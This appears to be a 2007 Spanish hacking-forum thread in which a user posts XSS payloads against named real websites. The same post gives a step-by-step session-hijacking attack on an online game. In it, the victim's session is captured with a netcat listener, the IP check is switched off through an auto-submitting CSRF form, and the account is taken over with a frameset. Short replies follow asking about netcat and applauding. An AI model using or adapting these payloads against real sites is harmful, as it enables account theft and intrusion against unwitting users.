Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: yeikos en 22 Abril 2007, 04:20 am



Título: Cross Site Scripting (XSS)
Publicado por: yeikos en 22 Abril 2007, 04:20 am
Cross Site Scripting (XSS)

Dado que la información aqui mostrada no muestra links directos a terceros, pero que se puede inferir el link, el que desee que se quite algun link aqui mostrado, hagalo saber..

El autor no se hace responsable de los malos usos que se le de a este documento...

Código:
<META HTTP-EQUIV="Refresh" CONTENT="1; URL=javascript:document.forms[0].submit()">
<form action="http:// s e x y o n o .com/grupos/" method="POST">
<input type="hidden" name="buscargrupo" value="
<script>alert(String.fromCharCode(88,83,83,32,66,89,32,89,69,73,75,48,83))</script>">
</form>

Código:
http://www. v o t a m i c u e r p o .com/usuario.php?funcion=bloqueados&usuario=
<SCRIPT>alert(String.fromCharCode(88,83,83,32,66,89,32,89,69,73,75,48,83));</script>&
Submit=Bloquear

Código:
http://ogameXXX.de/game/redir.php?url=
"><script>alert(String.fromCharCode(88,83,83,32,66,89,32,89,69,73,75,48,83))</script>

He encontrado más XSS esta semana, y varias son de páginas de alto prestigio, tipo MSN Hotmail, MSN Live, etc. Pero prefiero no publicarlo para evitar malos usos... a cambio les he dejado esto.

Os depcepcionaré al deciros que el último XSS no os servirá para lo que estais pensando, pues los contenidos de la cookie de oGame caracen de valor administrativo.

Pero quizás os alegre saber que en la variable session se deposita todo el valor necesario para administrar cualquier cuenta, tan solo es necesario que la víctima utilice un skin alojado en nuestro servidor o preguntarle el valor de la session mediante IS. Al desconocer su valor, no le dará ninguna importancia a esta.

Una vez cambiado el skin, desde nuestra máquina ponemos el netcat a escuchar el puerto 80 (nc -vv -L -p 80) para capturar la session, cerramos la conexión y a continuación hacemos que la victima ingrese en este formulario para desactivarle el IP-CHECK y así poder acceder a la misma session con IPs diferentes.

Código:
<META HTTP-EQUIV="Refresh" CONTENT="1; URL=javascript:document.forms[0].submit()">
<form action="options.php?session=SESSION&mode=change" method="POST" >
<input type="hidden" name="dpath" value="http://127.0.0.1/skin/">
<input type="checkbox" name="design" checked>
<input type="checkbox" name="noipcheck" checked>
</form>

Deberá identificarse de nuevo, así que volveremos a capturar la session, y una vez capturada ya podremos acceder a la cuenta...

Código:
<frameset framespacing="0" border="0" cols="190,*" frameborder="0">
<frame name="Inhalt" target="Hauptframe" src="http:/ogameXXX/game/leftmenu.php?session=SESSION"
noresize marginwidth="0" marginheight="0">
<frame name="Hauptframe" src="http://ogameXXX.de/game/overview.php?session=SESSION" target="_blank">
<noframes></noframes></frameset>

Quien quiera compartir información de cualquier tipo o tenga proyectos en mente, estaré encatado de conversar/devatir nuevas ideas, ¡Hasta entonces!  :P

PD: Por favor, eviten el uso del nombre de las páginas de las primeras dos inyecciones XSS para que google no las incluya en su buscador, gracias.


Título: Re: Cross Site Scripting (XSS)
Publicado por: samuel123 en 27 Mayo 2007, 19:04 pm
Desde msdos puedo  tambien ponerme a escuchar el puerto 80?

salu2


Título: Re: Cross Site Scripting (XSS)
Publicado por: yeikos en 27 Mayo 2007, 21:00 pm
No, necesitas alguna herramienta tipo Netcat.


Título: Re: Cross Site Scripting (XSS)
Publicado por: Man-In-the-Middle en 28 Mayo 2007, 05:59 am
Mas que Palmas, para esta informacion , clap clap clap